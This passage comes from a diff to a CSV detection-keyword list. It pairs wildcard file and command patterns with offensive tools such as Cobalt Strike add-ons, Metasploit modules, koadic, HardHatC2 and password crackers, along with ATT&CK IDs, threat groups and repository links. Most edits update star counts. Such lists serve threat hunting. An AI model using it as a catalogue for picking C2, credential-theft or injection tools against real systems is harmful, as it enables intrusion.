T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*EncryptedZIP.csproj*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*EncryptedZIP.exe*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*EncryptShellcode(*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*Endpoint-EE15B860-9EEC-EC11-BB3D-0022482CA4A7.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" "*ENDTHISFILETRANSMISSIONEGRESSASSESS*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*ENDTHISFILETRANSMISSIONEGRESSASSESS*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*Enelg52/KittyStager*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*Enelg52/KittyStager*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*Engineer_super.exe*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*engjibo/NetUser*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" "*enigma_fileless_uac_bypass*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*enigma0x3*","offensive_tool_keyword","Github Username","Github Author of malicious script and eploitaiton tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/enigma0x3","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*enkomio/AlanFramework*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" -"*enpass2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*enpass5tojohn.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*enpass2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*enpass5tojohn.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*Enter-SMBSession -ComputerName *","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","0","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" "*Enter-SMBSession* -PipeName * -ServiceName *","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","0","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" "*Enter-WmiShell *","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","0","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "*Enter-WmiShell.ps1*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "*--entrypoint Dinjector*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","","","" -"*enum_artifacts_list.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*enum_av_excluded.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*enum_avproducts.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*enum_brocade.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*enum_artifacts_list.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_av_excluded.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_avproducts.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*enum_brocade.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*enum_domain_info.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*enum_firefox.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*enum_hostfile.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*enum_logged_on_users*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*enum_logged_on_users.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*enum_mikrotik.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*enum_ms_product_keys.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*enum_firefox.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_hostfile.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_logged_on_users*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_logged_on_users.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_mikrotik.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*enum_ms_product_keys.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*enum_printers.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*enum_shares.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*enum_shares.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better 